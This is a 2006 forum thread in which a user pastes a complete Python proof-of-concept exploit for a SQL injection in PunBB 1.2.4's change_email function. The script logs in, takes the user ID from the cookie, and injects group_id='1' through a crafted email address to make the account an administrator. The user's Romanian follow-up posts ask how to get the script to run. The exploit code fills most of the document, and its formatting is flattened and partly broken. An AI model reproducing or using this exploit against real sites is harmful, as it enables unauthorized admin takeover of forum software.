Criminal Posted June 27, 2006 Report Posted June 27, 2006 #!/usr/bin/python######################################################################## _ _ _ _ ___ _ _ ___ # | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ # | __ |/ _` || '_|/ _` |/ -_)| ' / -_)/ _` ||___|| _/| __ || _/# |_||_|__,_||_| __,_|___||_||_|___|__,_| |_| |_||_||_| # ######################################################################## Proof of concept code from the Hardened-PHP Project ######################################################################### -= PunBB 1.2.4 =-# change_email SQL injection exploit## user-supplied data within the database is still user-supplied data########################################################################import urllibimport getoptimport sysimport string__argv__ = sys.argvdef banner(): print "PunBB 1.2.4 - change_email SQL injection exploit" print "Copyright © 2005 Hardened-PHP Projectn"def usage(): banner() print "Usage:n" print " $ ./punbb_change_email.py [options]n" print " -h http_url url of the punBB forum to exploit" print " f.e. http://www.forum.net/punBB/" print " -u username punBB forum useraccount" print " -p password punBB forum userpassword" print " -e email email address where the admin leve activation email is sent" print " -d domain catch all domain to catch "some-SQL-Query"@domain emails" print "" sys.exit(-1)def main(): try: opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:D:") except getopt.GetoptError: usage() if len(__argv__) < 10: usage() username = None password = None email = None domain = None host = None for o, arg in opts: if o == "-h": host = arg if o == "-u": username = arg if o == "-p": password = arg if o == "-e": email = arg if o == "-d": domain = arg # Printout banner banner() # Check if everything we need is there if host == None: print "[-] need a host to connect to" sys.exit(-1) if username == None: print "[-] username needed to continue" sys.exit(-1) if password == None: print "[-] password needed to continue" sys.exit(-1) if email == None: print "[-] email address needed to continue" sys.exit(-1) if domain == None: print "[-] catch all domain needed to continue" sys.exit(-1) # Retrive cookie params = { 'req_username' : username, 'req_password' : password, 'form_sent' : 1 } wclient = urllib.URLopener() print "[+] Connecting to retrieve cookie" req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params)) info = req.info() if 'set-cookie' not in info: print "[-] Unable to retrieve cookie... something is wrong" sys.exit(-3) cookie = info['set-cookie'] cookie = cookie[:string.find(cookie, ';')] print "[+] Cookie found - extracting user_id" user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")] print "[+] User-ID: %d" % (int(user_id)) wclient.addheader('Cookie', cookie); email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"',' append = 'group_id='1' email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain params = { 'req_new_email' : email, 'form_sent' : 1 } print "[+] Connecting to request change email" req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params)) print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"if __name__ == "__main__": main()Chestia e k mam pierdut...se deschide cu python...dar ce extensie sa ii pun la exploit? Quote
Criminal Posted June 27, 2006 Author Report Posted June 27, 2006 ms mult dar i se schimba doar icoana...knd intru in el...apare o fereastra gen cmd si dispare repede...sti cumva dc? Quote
Criminal Posted June 27, 2006 Author Report Posted June 27, 2006 nu am reusit imi da mereu eroare la cmd...operation is not .... Quote
